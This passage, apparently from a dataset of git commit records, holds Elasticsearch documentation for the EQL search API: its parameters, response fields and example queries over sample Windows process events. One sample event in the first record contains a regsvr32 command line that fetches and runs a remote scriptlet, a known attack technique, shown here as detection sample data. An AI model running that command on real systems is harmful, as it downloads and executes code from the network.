executing.\n\n[IMPORTANT]\n====\nIf this parameter and the `is_partial` parameter are `true`, the search is an\n<<eql-search-async,ongoing async search>>. If the `keep_alive` period does not\npass, the complete search results will be available when the search completes.\n\nIf `is_partial` is `true` but `is_running` is `false`, the search returned\npartial results due to a failure. Only some shards returned results or the node\ncoordinating the search failed.\n====\n--\n\n`took`::\n+\n--\n(integer)\nMilliseconds it took {es} to execute the request.\n\nThis value is calculated by measuring the time elapsed\nbetween receipt of a request on the coordinating node\nand the time at which the coordinating node is ready to send the response.\n\nTook time includes:\n\n* Communication time between the coordinating node and data nodes\n* Time the request spends in the `search` <<modules-threadpool,thread pool>>,\n queued for execution\n* Actual execution time\n\nTook time does *not* include:\n\n* Time needed to send the request to {es}\n* Time needed to serialize the JSON response\n* Time needed to send the response to a client\n--\n\n`timed_out`::\n(boolean)\nIf `true`, the request timed out before completion.\n\n`hits`::\n(object)\nContains matching events and sequences. Also contains related metadata.\n+\n.Properties of `hits`\n[%collapsible%open]\n====\n\n`total`::\n(object)\nMetadata about the number of matching events or sequences.\n+\n.Properties of `total`\n[%collapsible%open]\n=====\n\n`value`::\n(integer)\nFor <<eql-basic-syntax,basic queries>>, the total number of matching events.\n+\nFor <<eql-sequences,sequence queries>>, the total number of matching sequences.\n\n`relation`::\n+\n--\n(string)\nIndicates whether the number of events or sequences returned is accurate or a\nlower bound.\n\nReturned values are:\n\n`eq`::: Accurate\n`gte`::: Lower bound, including returned events or sequences\n--\n=====\n\n`sequences`::\n(array of objects)\nContains event sequences matching the query. Each object represents a\nmatching sequence. This parameter is only returned for EQL queries containing\na <<eql-sequences,sequence>>.\n+\n.Properties of `sequences` objects\n[%collapsible%open]\n=====\n`join_keys`::\n(array of values)\nShared field values used to constrain matches in the sequence. These are defined\nusing the <<eql-sequences,`by` keyword>> in the EQL query syntax.\n\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n======\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n======\n=====\n\n[[eql-search-api-response-events]]\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n=====\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n=====\n====\n\n[[eql-search-api-example]]\n==== {api-examples-title}\n\n[[eql-search-api-basic-query-ex]]\n===== Basic query example\n\nThe following EQL search request searches for events with an `event.category` of\n`process` that meet the following conditions:\n\n* A `process.name` of `cmd.exe`\n* An `process.pid` other than `2013`\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n process where (process.name == \"cmd.exe\" and process.pid != 2013)\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\nThe API returns the following response. Matching events in the `hits.events`\nproperty are sorted by <<eql-search-api-timestamp-field,timestamp>>, converted\nto milliseconds since the {wikipedia}\/Unix_time[Unix epoch],\nin ascending order.\n\nIf two or more events share the same timestamp, the\n<<eql-search-api-tiebreaker-field,`tiebreaker_field`>> field is used to sort\nthe events in ascending, lexicographic order.\n\n[source,console-result]\n----\n{\n \"is_partial\": false,\n \"is_running\": false,\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 2,\n \"relation\": \"eq\"\n },\n \"events\": [\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"babI3XMBI9IjHuIqU0S_\",\n \"_source\": {\n \"@timestamp\": \"2099-12-06T11:04:05.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"edwCRnyD\",\n \"sequence\": 1\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n },\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"b6bI3XMBI9IjHuIqU0S_\",\n \"_source\": {\n \"@timestamp\": \"2099-12-07T11:06:07.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"cMyt5SZ2\",\n \"sequence\": 3\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"babI3XMBI9IjHuIqU0S_\"\/\"_id\": $body.hits.events.0._id\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"b6bI3XMBI9IjHuIqU0S_\"\/\"_id\": $body.hits.events.1._id\/]\n\n[[eql-search-api-sequence-ex]]\n===== Sequence query example\n\nThe following EQL search request matches a <<eql-sequences,sequence>> of events\nthat:\n\n. Start with an event with:\n+\n--\n* An `event.category` of `file`\n* A `file.name` of `cmd.exe`\n* An `process.pid` other than `2013`\n--\n. Followed by an event with:\n+\n--\n* An `event.category` of `process`\n* A `process.executable` that contains the substring `regsvr32`\n--\n\nThese events must also share the same `process.pid` value.\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n sequence by process.pid\n [ file where file.name == \"cmd.exe\" and process.pid != 2013 ]\n [ process where stringContains(process.executable, \"regsvr32\") ]\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\nThe API returns the following response. Matching sequences are included in the\n`hits.sequences` property. The `hits.sequences.join_keys` property contains the\nshared `process.pid` value for each matching event.\n\n[source,console-result]\n----\n{\n \"is_partial\": false,\n \"is_running\": false,\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"sequences\": [\n {\n \"join_keys\": [\n 2012\n ],\n \"events\": [\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"AtOJ4UjUBAAx3XR5kcCM\",\n \"_source\": {\n \"@timestamp\": \"2099-12-06T11:04:07.000Z\",\n \"event\": {\n \"category\": \"file\",\n \"id\": \"dGCHwoeS\",\n \"sequence\": 2\n },\n \"file\": {\n \"accessed\": \"2099-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"cmd.exe\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n }\n },\n {\n \"_index\": \"my-index-000001\",\n \"_id\": \"OQmfCaduce8zoHT93o4H\",\n \"_source\": {\n \"@timestamp\": \"2099-12-07T11:07:09.000Z\",\n \"event\": {\n \"category\": \"process\",\n \"id\": \"aR3NWVOs\",\n \"sequence\": 4\n },\n \"process\": {\n \"pid\": 2012,\n \"name\": \"regsvr32.exe\",\n \"command_line\": \"regsvr32.exe \/s \/u \/i:https:\/\/...RegSvr32.sct scrobj.dll\",\n \"executable\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\"\n }\n }\n }\n ]\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"AtOJ4UjUBAAx3XR5kcCM\"\/\"_id\": $body.hits.sequences.0.events.0._id\/]\n\/\/ TESTRESPONSE[s\/\"_id\": \"OQmfCaduce8zoHT93o4H\"\/\"_id\": $body.hits.sequences.0.events.1._id\/]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f1b8df93cd9e0a733c6a597c24270d3c3a61160c","subject":"[DOCS] EQL: Fix hits param for sequences (#57410)","message":"[DOCS] EQL: Fix hits param for sequences (#57410)\n\n","repos":"uschindler\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/eql\/eql-search-api.asciidoc","new_file":"docs\/reference\/eql\/eql-search-api.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n\n[[eql-search-api]]\n=== EQL search API\n++++\n<titleabbrev>EQL search<\/titleabbrev>\n++++\n\nexperimental::[]\n\nReturns search results for an <<eql,Event Query Language (EQL)>> query.\n\nIn {es}, EQL assumes each document in an index corresponds to an event.\n\n\/\/\/\/\n[source,console]\n----\nPUT \/my_index\/_bulk?refresh\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"1\"}}\n{ \"@timestamp\": \"2020-12-06T11:04:05.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"2\"}}\n{ \"@timestamp\": \"2020-12-06T11:04:07.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"file\" }, \"file\": { \"accessed\": \"2020-12-07T11:07:08.000Z\", \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"type\": \"file\", \"size\": 16384 }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"3\"}}\n{ \"@timestamp\": \"2020-12-07T11:06:07.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"4\"}}\n{ \"@timestamp\": \"2020-12-07T11:07:08.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"file\" }, \"file\": { \"accessed\": \"2020-12-07T11:07:08.000Z\", \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"type\": \"file\", \"size\": 16384 }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"5\"}}\n{ \"@timestamp\": \"2020-12-07T11:07:09.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"regsvr32.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\" } }\n----\n\/\/ TESTSETUP\n\/\/\/\/\n\n[source,console]\n----\nGET \/my_index\/_eql\/search\n{\n \"query\": \"\"\"\n process where process.name = \"regsvr32.exe\"\n \"\"\"\n}\n----\n\n[[eql-search-api-request]]\n==== {api-request-title}\n\n`GET \/<index>\/_eql\/search`\n\n`POST \/<index>\/_eql\/search`\n\n[[eql-search-api-prereqs]]\n==== {api-prereq-title}\n\nSee <<eql-requirements,EQL requirements>>.\n\n[[eql-search-api-limitations]]\n===== Limitations\n\nSee <<eql-limitations,EQL limitations>>.\n\n[[eql-search-api-path-params]]\n==== {api-path-parms-title}\n\n`<index>`::\n(Required, string)\nComma-separated list of index names or <<indices-aliases,index aliases>> used to\nlimit the request. Accepts wildcard expressions.\n+\nTo search all indices, use `_all` or `*`.\n\n[[eql-search-api-query-params]]\n==== {api-query-parms-title}\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=allow-no-indices]\n+\nDefaults to `false`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=expand-wildcards]\n+\nDefaults to `open`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=index-ignore-unavailable]\n\n[[eql-search-api-request-body]]\n==== {api-request-body-title}\n\n`case_sensitive`::\n(Optional, boolean)\nIf `true`, matching for the <<eql-search-api-request-query-param,EQL query>> is\ncase sensitive. Defaults to `false`.\n\n`event_category_field`::\n(Required*, string)\nField containing the event classification, such as `process`, `file`, or\n`network`.\n+\nDefaults to `event.category`, as defined in the {ecs-ref}\/ecs-event.html[Elastic\nCommon Schema (ECS)]. If an index does not contain the `event.category` field,\nthis value is required.\n\n`filter`::\n(Optional, <<query-dsl,query DSL object>>)\nQuery, written in query DSL, used to filter the events on which the EQL query\nruns.\n\n`implicit_join_key_field`::\n(Optional, string)\nReserved for future use.\n\n[[eql-search-api-request-query-param]]\n`query`::\n(Required, string)\n<<eql-syntax,EQL>> query you wish to run.\n+\nIMPORTANT: This parameter supports a subset of EQL syntax. See\n<<eql-unsupported-syntax>>.\n\n`search_after`::\n(Optional, string)\nReserved for future use.\n\n`size`::\n(Optional, integer or float)\nMaximum number of matching events to return. Defaults to `50`. Values must be\ngreater than `0`.\n\n[[eql-search-api-timestamp-field]]\n`timestamp_field`::\n+\n--\n(Required*, string)\nField containing event timestamp.\n\nDefaults to `@timestamp`, as defined in the\n{ecs-ref}\/ecs-event.html[Elastic Common Schema (ECS)]. If an index does not\ncontain the `@timestamp` field, this value is required.\n\nEvents in the API response are sorted by this field's value, converted to\nmilliseconds since the https:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch], in\nascending order.\n--\n\n[role=\"child_attributes\"]\n[[eql-search-api-response-body]]\n==== {api-response-body-title}\n\n`took`::\n+\n--\n(integer)\nMilliseconds it took {es} to execute the request.\n\nThis value is calculated by measuring the time elapsed\nbetween receipt of a request on the coordinating node\nand the time at which the coordinating node is ready to send the response.\n\nTook time includes:\n\n* Communication time between the coordinating node and data nodes\n* Time the request spends in the `search` <<modules-threadpool,thread pool>>,\n queued for execution\n* Actual execution time\n\nTook time does *not* include:\n\n* Time needed to send the request to {es}\n* Time needed to serialize the JSON response\n* Time needed to send the response to a client\n--\n\n`timed_out`::\n(boolean)\nIf `true`, the request timed out before completion.\n\n`hits`::\n(object)\nContains matching events and sequences. Also contains related metadata.\n+\n.Properties of `hits`\n[%collapsible%open]\n====\n\n`total`::\n(object)\nMetadata about the number of matching events or sequences.\n+\n.Properties of `total`\n[%collapsible%open]\n=====\n\n`value`::\n(integer)\nFor <<eql-basic-syntax,basic queries>>, the total number of matching events.\n+\nFor <<eql-sequences,sequence queries>>, the total number of matching sequences.\n\n`relation`::\n+\n--\n(string)\nIndicates whether the number of events or sequences returned is accurate or a\nlower bound.\n\nReturned values are:\n\n`eq`::: Accurate\n`gte`::: Lower bound, including returned events or sequences\n--\n=====\n\n`sequences`::\n(array of objects)\nContains event sequences matching the query. Each object represents a\nmatching sequence. This parameter is only returned for EQL queries containing\na <<eql-sequences,sequence>>.\n+\n.Properties of `sequences` objects\n[%collapsible%open]\n=====\n`join_keys`::\n(array of strings)\nShared field values used to constrain matches in the sequence. These are defined\nusing the <<eql-sequences,`by` keyword>> in the EQL query syntax.\n\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n======\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_score`::\n(float)\nPositive 32-bit floating point number used to determine the relevance of the\n event. See <<relevance-scores>>.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n\n`sort`::\n(array)\nInteger used as the sort value for the event.\n+\nBy default, this is the event's <<eql-search-api-timestamp-field,timestamp\nvalue>>, converted to milliseconds since the\nhttps:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch].\n======\n=====\n\n[[eql-search-api-response-events]]\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n=====\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_score`::\n(float)\nPositive 32-bit floating point number used to determine the relevance of the\n event. See <<relevance-scores>>.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n\n`sort`::\n(array)\nInteger used as the sort value for the event.\n+\nBy default, this is the event's <<eql-search-api-timestamp-field,timestamp\nvalue>>, converted to milliseconds since the\nhttps:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch].\n=====\n====\n\n[[eql-search-api-example]]\n==== {api-examples-title}\n\n[[eql-search-api-basic-query-ex]]\n===== Basic query example\n\nThe following EQL search request searches for events with an `event.category` of\n`file` that meet the following conditions:\n\n* A `file.name` of `cmd.exe`\n* An `agent.id` other than `my_user`\n\n[source,console]\n----\nGET \/my_index\/_eql\/search\n{\n \"query\": \"\"\"\n file where (file.name == \"cmd.exe\" and agent.id != \"my_user\")\n \"\"\"\n}\n----\n\nThe API returns the following response. Matching events in the `hits.events`\nproperty are sorted by <<eql-search-api-timestamp-field,timestamp>>, converted\nto milliseconds since the https:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch],\nin ascending order.\n\n[source,console-result]\n----\n{\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 2,\n \"relation\": \"eq\"\n },\n \"events\": [\n {\n \"_index\": \"my_index\",\n \"_id\": \"2\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-06T11:04:07.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"file\"\n },\n \"file\": {\n \"accessed\": \"2020-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n },\n \"sort\": [\n 1607252647000\n ]\n },\n {\n \"_index\": \"my_index\",\n \"_id\": \"4\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-07T11:07:08.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"file\"\n },\n \"file\": {\n \"accessed\": \"2020-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n },\n \"sort\": [\n 1607339228000\n ]\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\n[[eql-search-api-sequence-ex]]\n===== Sequence query example\n\nThe following EQL search request matches a <<eql-sequences,sequence>> of events\nthat:\n\n. Start with an event with:\n+\n--\n* An `event.category` of `file`\n* A `file.name` of `cmd.exe`\n* An `agent.id` other than `my_user`\n--\n. Followed by an event with:\n+\n--\n* An `event.category` of `process`\n* A `process.path` that contains the substring `regsvr32`\n--\n\nThese events must also share the same `agent.id` value.\n\n[source,console]\n----\nGET \/my_index\/_eql\/search\n{\n \"query\": \"\"\"\n sequence by agent.id\n [ file where file.name == \"cmd.exe\" and agent.id != \"my_user\" ]\n [ process where stringContains(process.path, \"regsvr32\") ]\n \"\"\"\n}\n----\n\nThe API returns the following response. The `hits.sequences.join_keys` property\ncontains the shared `agent.id` value for each matching event. Matching events in\nthe `hits.sequences.events` property are sorted by\n<<eql-search-api-timestamp-field,timestamp>>, converted to milliseconds since\nthe https:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch], in ascending order.\n\n[source,console-result]\n----\n{\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"sequences\": [\n {\n \"join_keys\": [\n \"8a4f500d\"\n ],\n \"events\": [\n {\n \"_index\": \"my_index\",\n \"_id\": \"4\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-07T11:07:08.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"file\"\n },\n \"file\": {\n \"accessed\": \"2020-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n },\n \"fields\": {\n \"@timestamp\": [\n \"1607339228000\"\n ]\n },\n \"sort\": [\n 1607339228000\n ]\n },\n {\n \"_index\": \"my_index\",\n \"_id\": \"5\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-07T11:07:09.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"process\"\n },\n \"process\": {\n \"name\": \"regsvr32.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\"\n }\n },\n \"fields\": {\n \"@timestamp\": [\n \"1607339229000\"\n ]\n },\n \"sort\": [\n 1607339229000\n ]\n }\n ]\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n","old_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n\n[[eql-search-api]]\n=== EQL search API\n++++\n<titleabbrev>EQL search<\/titleabbrev>\n++++\n\nexperimental::[]\n\nReturns search results for an <<eql,Event Query Language (EQL)>> query.\n\nIn {es}, EQL assumes each document in an index corresponds to an event.\n\n\/\/\/\/\n[source,console]\n----\nPUT \/my_index\/_bulk?refresh\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"1\"}}\n{ \"@timestamp\": \"2020-12-06T11:04:05.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"2\"}}\n{ \"@timestamp\": \"2020-12-06T11:04:07.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"file\" }, \"file\": { \"accessed\": \"2020-12-07T11:07:08.000Z\", \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"type\": \"file\", \"size\": 16384 }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"3\"}}\n{ \"@timestamp\": \"2020-12-07T11:06:07.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"4\"}}\n{ \"@timestamp\": \"2020-12-07T11:07:08.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"file\" }, \"file\": { \"accessed\": \"2020-12-07T11:07:08.000Z\", \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"type\": \"file\", \"size\": 16384 }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"5\"}}\n{ \"@timestamp\": \"2020-12-07T11:07:09.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"regsvr32.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\" } }\n----\n\/\/ TESTSETUP\n\/\/\/\/\n\n[source,console]\n----\nGET \/my_index\/_eql\/search\n{\n \"query\": \"\"\"\n process where process.name = \"regsvr32.exe\"\n \"\"\"\n}\n----\n\n[[eql-search-api-request]]\n==== {api-request-title}\n\n`GET \/<index>\/_eql\/search`\n\n`POST \/<index>\/_eql\/search`\n\n[[eql-search-api-prereqs]]\n==== {api-prereq-title}\n\nSee <<eql-requirements,EQL requirements>>.\n\n[[eql-search-api-limitations]]\n===== Limitations\n\nSee <<eql-limitations,EQL limitations>>.\n\n[[eql-search-api-path-params]]\n==== {api-path-parms-title}\n\n`<index>`::\n(Required, string)\nComma-separated list of index names or <<indices-aliases,index aliases>> used to\nlimit the request. Accepts wildcard expressions.\n+\nTo search all indices, use `_all` or `*`.\n\n[[eql-search-api-query-params]]\n==== {api-query-parms-title}\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=allow-no-indices]\n+\nDefaults to `false`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=expand-wildcards]\n+\nDefaults to `open`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=index-ignore-unavailable]\n\n[[eql-search-api-request-body]]\n==== {api-request-body-title}\n\n`case_sensitive`::\n(Optional, boolean)\nIf `true`, matching for the <<eql-search-api-request-query-param,EQL query>> is\ncase sensitive. Defaults to `false`.\n\n`event_category_field`::\n(Required*, string)\nField containing the event classification, such as `process`, `file`, or\n`network`.\n+\nDefaults to `event.category`, as defined in the {ecs-ref}\/ecs-event.html[Elastic\nCommon Schema (ECS)]. If an index does not contain the `event.category` field,\nthis value is required.\n\n`filter`::\n(Optional, <<query-dsl,query DSL object>>)\nQuery, written in query DSL, used to filter the events on which the EQL query\nruns.\n\n`implicit_join_key_field`::\n(Optional, string)\nReserved for future use.\n\n[[eql-search-api-request-query-param]]\n`query`::\n(Required, string)\n<<eql-syntax,EQL>> query you wish to run.\n+\nIMPORTANT: This parameter supports a subset of EQL syntax. See\n<<eql-unsupported-syntax>>.\n\n`search_after`::\n(Optional, string)\nReserved for future use.\n\n`size`::\n(Optional, integer or float)\nMaximum number of matching events to return. Defaults to `50`. Values must be\ngreater than `0`.\n\n[[eql-search-api-timestamp-field]]\n`timestamp_field`::\n+\n--\n(Required*, string)\nField containing event timestamp.\n\nDefaults to `@timestamp`, as defined in the\n{ecs-ref}\/ecs-event.html[Elastic Common Schema (ECS)]. If an index does not\ncontain the `@timestamp` field, this value is required.\n\nEvents in the API response are sorted by this field's value, converted to\nmilliseconds since the https:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch], in\nascending order.\n--\n\n[role=\"child_attributes\"]\n[[eql-search-api-response-body]]\n==== {api-response-body-title}\n\n`took`::\n+\n--\n(integer)\nMilliseconds it took {es} to execute the request.\n\nThis value is calculated by measuring the time elapsed\nbetween receipt of a request on the coordinating node\nand the time at which the coordinating node is ready to send the response.\n\nTook time includes:\n\n* Communication time between the coordinating node and data nodes\n* Time the request spends in the `search` <<modules-threadpool,thread pool>>,\n queued for execution\n* Actual execution time\n\nTook time does *not* include:\n\n* Time needed to send the request to {es}\n* Time needed to serialize the JSON response\n* Time needed to send the response to a client\n--\n\n`timed_out`::\n(boolean)\nIf `true`, the request timed out before completion.\n\n`hits`::\n(object)\nContains matching events and metadata.\n+\n.Properties of `hits`\n[%collapsible%open]\n====\n\n`total`::\n(object)\nMetadata about the number of matching events.\n+\n.Properties of `total`\n[%collapsible%open]\n=====\n\n`value`::\n(integer)\nTotal number of matching events.\n\n`relation`::\n+\n--\n(string)\nIndicates whether the number of events returned is accurate or a lower bound.\n\nReturned values are:\n\n`eq`::: Accurate\n`gte`::: Lower bound, including returned events\n--\n=====\n\n`sequences`::\n(array of objects)\nContains event sequences matching the query. Each object represents a\nmatching sequence. This parameter is only returned for EQL queries containing\na <<eql-sequences,sequence>>.\n+\n.Properties of `sequences` objects\n[%collapsible%open]\n=====\n`join_keys`::\n(array of strings)\nShared field values used to constrain matches in the sequence. These are defined\nusing the <<eql-sequences,`by` keyword>> in the EQL query syntax.\n\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n======\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_score`::\n(float)\nPositive 32-bit floating point number used to determine the relevance of the\n event. See <<relevance-scores>>.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n\n`sort`::\n(array)\nInteger used as the sort value for the event.\n+\nBy default, this is the event's <<eql-search-api-timestamp-field,timestamp\nvalue>>, converted to milliseconds since the\nhttps:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch].\n======\n=====\n\n[[eql-search-api-response-events]]\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n=====\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\n(string)\nUnique identifier 